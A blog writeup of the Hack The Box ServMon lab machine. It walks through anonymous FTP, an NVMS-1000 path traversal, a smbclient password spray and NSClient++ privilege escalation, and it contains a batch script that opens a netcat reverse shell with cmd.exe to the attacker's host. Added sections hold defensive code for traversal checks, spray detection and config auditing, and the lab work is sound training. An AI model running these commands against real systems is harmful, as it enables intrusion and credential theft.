Saturday, July 4, 2020

Hack The Box - ServMon

by Renato "shrimpgo" Pacheco

Hi! Let’s go for another Hack The Box writeup: the ServMon machine, rated easy. It’s a Windows machine, and below is the nmap recon:

[email protected]:~# nmap -sS -p- -O 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 23:48 -03
Nmap scan report for servmon (10.10.10.184)
Host is up (0.13s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5666/tcp  open  nrpe
6063/tcp  open  x11
6699/tcp  open  napster
7680/tcp  open  pando-pub
8443/tcp  open  https-alt
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 864.42 seconds

There are a lot of services available, and that is a good thing. The main services to enumerate are:

  • 21 FTP
  • 22 SSH
  • 445 SMB share
  • 80 HTTP (NVMS ???)
  • 8443 HTTPS (Nagios web config)
  • 5666 NRPE (Nagios agent)

Let’s start with FTP. The first thing to check on an FTP service is whether anonymous login is allowed (no password required).

[email protected]:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.

Nice! We’re in. There is a directory named Users, and inside it there are two directories: Nadine and Nathan:

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

The Nadine directory contains a text file called Confidential.txt that says:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

And the Nathan directory contains another text file called Notes to do.txt that says:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

We have several clues here; let’s put them together:

  • Nathan’s Desktop directory contains a file called Passwords.txt.
  • Only two of the tasks were completed by Nathan, so NVMS is still accessible.
  • What is NVMS?
  • We confirmed that NSClient is available on the host; it will be useful later.

So, what is NVMS? Browsing to port 80, I saw this login screen:

NVMS-1000

A first Google search told me that NVMS-1000 is a DVR (Digital Video Recorder), so I searched for vulnerabilities in it and found this: a script that exploits a path traversal in the NVMS-1000 web configuration. Using this script, let’s try to read Nathan’s Passwords.txt:

[email protected]:# ./nvms.py 10.10.10.184 /users/nathan/desktop/passwords.txt
[+] DT Attack Succeeded
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++  END  ++++++++++
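As an added defensive example (not part of the original writeup or of the NVMS-1000 code), this is how a web handler should resolve a requested path so that traversal sequences like the one the script above relies on cannot reach files outside the web root. The web root and the request paths are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root for the constructed example; NVMS-1000's real layout is
# not known to this code.
WEB_ROOT = "/srv/nvms/www"


def resolve_under_root(web_root: str, requested: str):
    """Map a URL path onto the filesystem, or return None if it would escape.

    Order matters: percent-decode once (so %2e%2e%2f is treated like ../),
    fold Windows backslashes (the target runs on Windows, where ..\\ is also a
    separator), anchor the path under the root, collapse . and .. segments,
    then confirm the result still starts with the root. Symlinks inside the
    root would need an extra realpath() check on a real filesystem.
    """
    decoded = unquote(requested).replace("\\", "/")
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def flag_traversal_requests(paths):
    """Return the request paths the check rejects; handy for triaging an
    access log after an incident like the one described above."""
    return [p for p in paths if resolve_under_root(WEB_ROOT, p) is None]


# Constructed request paths: ordinary resources plus the traversal variants
# a handler must reject (plain, percent-encoded and backslash forms).
SAMPLE_REQUESTS = [
    "/index.html",
    "/css/../js/app.js",
    "/../../users/nathan/desktop/passwords.txt",
    "/..%2f..%2fusers/nathan/desktop/passwords.txt",
    "/..\\..\\users\\nathan\\desktop\\passwords.txt",
]
```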

Now I have two users and seven passwords to try. I wrote a shell loop that uses smbclient to test each user against every password:

  • Nathan
    [email protected]:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nathan%$i -L //10.10.10.184/; done
    1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE
    Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE
    B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE
    [email protected] => session setup failed: NT_STATUS_LOGON_FAILURE
    0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE
    IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE
    Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE

    None of these passwords belongs to Nathan.

  • Nadine
    [email protected]:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nadine%$i -L //10.10.10.184/; done
    1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE
    Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE
    B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE
    [email protected] => 
          Sharename       Type      Comment
          ---------       ----      -------
          ADMIN$          Disk      Remote Admin
          C$              Disk      Default share
          IPC$            IPC       Remote IPC
    SMB1 disabled -- no workgroup available
    0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE
    IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE
    Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE

    Hey! User Nadine has the password [email protected]. I spent some time trying psexec, wmiexec and smbexec, and none of them worked. But I had forgotten my initial recon: there is an SSH service running on the host. OK then:

[email protected]:~# ssh [email protected]
[email protected]'s password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
                                                    
[email protected] C:\Users\Nadine>type Desktop\user.txt
[REDACTED]
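From the defender’s side, the spray above leaves a recognisable trace: one source producing a burst of failed network logons against several accounts, followed by a success. This added example (not from the writeup) scores that pattern over constructed logon records shaped like parsed Windows Security events 4625/4624; the timestamps, source addresses and thresholds are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_events():
    """Constructed logon records (timestamp, source IP, account, outcome) in the
    shape a SIEM holds after parsing Windows Security events 4625 (failure) and
    4624 (success) for network logons. They mirror the writeup: one source tries
    seven passwords for nathan, then seven for nadine (the 4th works); a second
    source is a user who mistyped once."""
    events, t = [], datetime(2020, 5, 7, 0, 10, 0)
    for user, outcomes in (("nathan", "FFFFFFF"), ("nadine", "FFFSFFF")):
        for o in outcomes:
            t += timedelta(seconds=3)
            events.append((t, "10.10.13.13", user, "success" if o == "S" else "failure"))
    events.append((datetime(2020, 5, 7, 0, 12, 0), "10.10.14.2", "nadine", "failure"))
    return events


def detect_spray(events, max_failures=5, window=timedelta(minutes=5)):
    """Return {source_ip: summary} for every source with at least `max_failures`
    failed logons inside any `window`-long span. A success from the same source
    after its first failure is reported separately: that is the moment a spray
    usually turns into a valid foothold."""
    by_src = defaultdict(list)
    for t, src, user, outcome in events:
        by_src[src].append((t, user, outcome))
    findings = {}
    for src, recs in by_src.items():
        recs.sort()
        failures = [(t, u) for t, u, o in recs if o == "failure"]
        left = peak = 0
        for right in range(len(failures)):  # sliding window over the failures
            while failures[right][0] - failures[left][0] > window:
                left += 1
            peak = max(peak, right - left + 1)
        if peak < max_failures:
            continue
        first_failure = failures[0][0]
        findings[src] = {
            "failed_logons": len(failures),
            "targeted_users": sorted({u for _, u in failures}),
            "success_after_failures": any(
                o == "success" and t > first_failure for t, _, o in recs),
        }
    return findings
```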

I’ve just owned user. Now I have to escalate privileges. After enumerating the host and looking for any administrative privileges, I found that the Nadine user has no special privileges at all, so I had to find another way up. Then I remembered the NSClient++ service running on the host. Searching for NSClient++ exploits, I found a guide (here) that explains how to escalate privileges through its web configuration interface. I tried to follow that tutorial: I took the password from \Program Files\NSClient++\nsclient.ini and tried to log in to the NSClient++ web configuration on port 8443, but it didn’t work. When I went back to Nadine’s checklist on FTP, I saw that NSClient access had been locked down, and nsclient.ini confirmed it:

[email protected] C:\Users\Nadine>type "\Program Files\NSClient++\nsclient.ini"
...
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
...

Now what? Once again I spent time wondering what to do. Then I decided to start from the beginning: reading the NSClient++ docs! At first glance, I noticed this:

NSClient++ Main Page

There is an API! And I already have the admin password from nsclient.ini. According to the manual, this is how to authenticate and access the NSClient++ API:

curl -s -k -u admin https://localhost:8443/api/v1/info

But there was no curl on the Windows host. I had to download it here, decompress it and copy the curl directory over SSH into Nadine’s profile. If everything works, the output looks like this:

{"name":"NSClient++","version":"0.5.2.35 2018-01-28","version_url":"https://localhost:8443/api/v1/info/version"}

Following here, the next steps are:

  • Create script to reverse shell
  • Register script into NSClient++
  • Force to run this script registered into NSClient++ (somehow)

The script needs to connect back to my host when NSClient++ calls it, but how? There are many ways to do this; I chose netcat, but you could pick PowerShell, Python, Lua… NSClient++ supports all of them. Pick one! Getting back to it, I downloaded netcat for Windows and sent it over.

I wrote the batch script below, named evil.bat, to register with NSClient++:

@echo off
c:\temp\nc.exe 10.10.13.13 4444 -e cmd.exe

And sent it via SSH:

[email protected]:~# scp evil.bat [email protected]:/users/nadine/Desktop

Alright! Time to register this script with NSClient++. After reading more of the NSClient++ documentation and learning about its API, I found this section and was able to register my script:

[email protected] C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
Added evil as scripts\evil.bat

The last step is to force NSClient++ to run my malicious script, as described in this section. Before that, I had to set up my host to listen for the incoming connection:

[email protected]:~# nc -lvp 4444
listening on [any] 4444...

Now I force my script to run:

[email protected] C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/queries/evil/commands/execute

Checking the terminal listening on port 4444:

[email protected]:~# nc -lvp 4444
listening on [any] 4444...
connect to [10.10.13.13] from servmon [10.10.10.184] 49733
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>

Game over!
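The escalation rests on two things a local audit can check for: the API password sitting in an nsclient.ini that an unprivileged user can read, and the WEBServer plus CheckExternalScripts modules that let any authenticated API caller register and execute a script as the service account. This added example (not from the writeup or the NSClient++ project) parses a constructed nsclient.ini fragment and reports those conditions; the section and module names follow the NSClient++ 0.5.x layout as I understand it and are assumptions, and the password value is a placeholder.

```python
import configparser

# Constructed nsclient.ini fragment shaped like the one in the writeup; the
# password is a placeholder. Assumed layout: [/modules] lists loaded modules,
# [/settings/default] holds the API password and the allowed hosts.
SAMPLE_INI = """
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled

[/settings/default]
; Undocumented key
password = PLACEHOLDER-API-PASSWORD
; Undocumented key
allowed hosts = 127.0.0.1
"""

LOCAL_ONLY = {"127.0.0.1", "::1", "localhost"}


def audit_nsclient(ini_text: str):
    """Return (severity, message) findings for the conditions the writeup chained."""
    cp = configparser.ConfigParser(interpolation=None)  # configparser lowercases keys
    cp.read_string(ini_text)
    mods = cp["/modules"] if cp.has_section("/modules") else {}
    enabled = {k for k, v in mods.items() if v.strip().lower() in ("enabled", "1", "true")}
    cfg = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    hosts = {h.strip() for h in cfg.get("allowed hosts", "").split(",") if h.strip()}
    findings = []
    if cfg.get("password"):
        findings.append(("high", "API password stored in plaintext; anyone who can read "
                                 "this file can authenticate to the API"))
        if hosts <= LOCAL_ONLY:
            findings.append(("info", "allowed hosts limits remote callers only; a local "
                                     "foothold (e.g. over SSH) still reaches the API"))
    if hosts - LOCAL_ONLY:
        findings.append(("medium", f"API reachable from non-local hosts: {sorted(hosts)}"))
    if {"webserver", "checkexternalscripts"} <= enabled:
        findings.append(("high", "WEBServer and CheckExternalScripts both enabled: an "
                                 "authenticated API caller can add and execute scripts"))
    return findings
```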

Hack the Box, Pentest, Writeup